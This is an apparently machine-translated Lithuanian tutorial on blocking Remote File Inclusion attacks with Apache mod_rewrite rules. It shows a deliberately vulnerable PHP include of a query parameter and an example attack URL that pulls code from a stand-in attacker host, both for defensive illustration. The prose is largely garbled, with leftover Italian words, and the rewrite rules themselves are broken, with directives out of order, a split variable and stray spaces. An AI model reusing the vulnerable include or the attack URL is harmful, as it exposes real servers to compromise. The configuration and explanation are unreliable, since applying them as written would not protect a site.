Naudojant mod_rewrite užkirsti kelią nuotolinio failų įtraukimas

Vienas iš dažniausių atakų patyrė tinklapis yra daroma bandoma įtraukti failus, kuriuose kenksmingą kodą, teoriškai kalbant apie ataka yra labai paprasta atlikti, tai padaryti tik todėl, kad failas, kuriame yra kenksmingą kodą ir URL tipas naršyklę.

Ši ataka, žinoma techninis terminas nuotolinio Failo įtraukimas arba paprastas trumpinys RFI, tipas dažnai susijęs su režimu vadinama įsilaužimo XSA (Cross-Server Attack ") paprastai atliekama siekiant kompromiso svetainių saugumo jei ne žiniatinklio serverį, veiksnys, kuris verčia dar labiau pavojinga RFI.

Pradėti puolimo RFI, užpuolikas turi "atminties" per programą, kurioje, kad jos įtraukimą nuotoliniu būdu, tai "Erdvė" paprastai "skylė" (klaida) saugumą, todėl pažeidžiamos scenarijų.
Klasikinis atvejis nuotėkio jautri RFI yra susijęs su išlaikęs puslapį per kintamųjų vardai, tiesiog paprastą kodo fragmentą, pavyzdžiui, kad tai kelia pavojų taikymo:

 



 # Include failus per eilutės užklausos kintamasis pro







 include ($ _GET ['puslapis']);

 

Kode mes neapibrėžtas kintamasis, ar veikiau turi būti apibrėžti pagal parametrus siunčiami per eilutės užklausos, pavyzdžiui, jei tiesioginio URL į puslapį, kuriame siūlomos sąrašas atrodys taip:

 



 http://www.sito.com/index.php?pagina=news.php

 

kintamojo $ puslapis vertė yra lygi "Naujienos" dėl šio prašymo ataka gali būti vykdomas tokiu būdu:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Failą "x.php", į sėkmingą išpuolio atveju, gali būti bet kenksmingą kodą tipą ir sugadinti daug esmines ir galutines nei atakos paprastumas gali būti mąstyti.

Laimei, yra keletas gynybos metodus, kurie gali būti naudojami siekiant užkirsti kelią tokiems išpuoliams, per šį trumpą diskusiją mes analizuoti vienas pagrįstas URL perrašyti modulis (mod_rewrite) pateikė Apache web serveris, kuris gali būti naudojamas metodais skirtingi.

Vienas iš labiausiai klasikinių siųsti instrukcijas Apache web serveris yra naudoti klasika. Htaccess faile turi būti įtraukti į aplanką, kurį norite apsaugoti nuo užpuolimo.

Pirmasis metodas, kad mes naudojame yra įterpti paprastą taisyklę A. Htaccess failą:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Taisyklė nurodo, kad suformuluota eilutės užklausos ("{QUERY_STRING}") negali būti perduota argumentus, kurių sudėtyje yra priesagos "http", "https" ir "FTP", nesvarbu, ką ankstesnį arba kitą turinį ("(.*)" ) parametrai. Jei taip atsitinka serverio sugrįš tipo 403 (draudžiami) klaidą.

Tie, kurie turi tiesioginę prieigą prie konfigūracijos failo Apache (httpd.conf) galimybe, ji gali būti įterptas viduje vieną talpyklę direktyva gali turėti įtakos panašios į taisykles, nustatytas prededentemente:

 # Įsitikinkite, kad mod_rewrite yra







 <IfModule Mod_rewrite.c>







 # Aktyvuoti URL perrašyti variklis

 





 RewriteEngine on

 





 # Mes nustatome mūsų valstybę nuo RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filtruoti įmanoma prašymus įtraukti ir antkainis







 # Vraibile su aplinka [E = varname: reikšmė]







 ^(.+)$ RewriteRule - [F, E = RFI: tiesa]

 





 </ IfModule>

 





 # Creaimo mėginimų RFI mes identficato Prisijungti







 # Anksčiau naudojant "aplinkos kintamąjį"







 CustomLog / FOLDER_NAME / rfi.log kartu env = RFI

Po raštu direktyvos konfigūracijos failą, turite i ¹ saugoti pakeitimus ir perkraukite web serverį, kad įsigaliotų, atkreipkite dėmesį, kad iš aukciono pabaigos, ir už konteinerį buvo įtrauktas prašymas kurti žurnalo failą skirtas įrašyti prašymus nuotolinio failo įtraukimas, stebėsenos šio mažo "blokavimas Pastabos RFI atakų," mes atrasite, kad Remote File Inclusion mūsų svetainės bandoma mažiau neįprasta, nei tikėjo.